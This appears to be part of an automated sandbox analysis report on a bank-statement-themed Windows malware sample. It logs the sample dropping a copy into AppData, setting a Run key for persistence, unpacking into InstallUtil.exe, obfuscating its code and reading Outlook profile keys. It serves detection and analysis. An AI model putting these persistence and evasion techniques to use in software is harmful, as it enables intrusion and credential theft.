Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_01
Source: 15.0.InstallUtil.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.4.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.1.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.1.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.2.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.0.InstallUtil.exe.400000.2.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: protobuf-net.pdbSHA256 source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp, Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000011.00000002.547037935.0000000005530000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544927874.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.544880727.0000000003D69000.00000004.00000800.00020000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.546352274.0000000005DA0000.00000004.08000000.00040000.00000000.sdmp, Ffnbziuo.exe, 00000012.00000002.548731838.0000000008427000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Halkbank_Ekstre_20220513_082357_541079.exe, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Ffnbziuo.exe.0.dr, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.Ffnbziuo.exe.10000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.Ffnbziuo.exe.10000.0.unpack, Google.cs .Net Code: Featured System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06459F88 push eax; retf 0_2_06459F96
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645FB69 push eax; iretd 0_2_0645FB79
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645F338 pushfd ; retf 0_2_0645F339
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645F1D8 pushad ; retf 0_2_0645F341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331662 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633166A push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633165E push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316A6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169A push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169E push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DA push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DE push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C2 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C6 push es; ret 15_2_063318C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316CA push es; ret 15_2_063318C4
Binary contains a suspicious time stamp
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: 0x90D0B804 [Fri Dec 28 08:15:00 2046 UTC]
Drops PE files
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Jump to dropped file
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ffnbziuo Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ffnbziuo Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
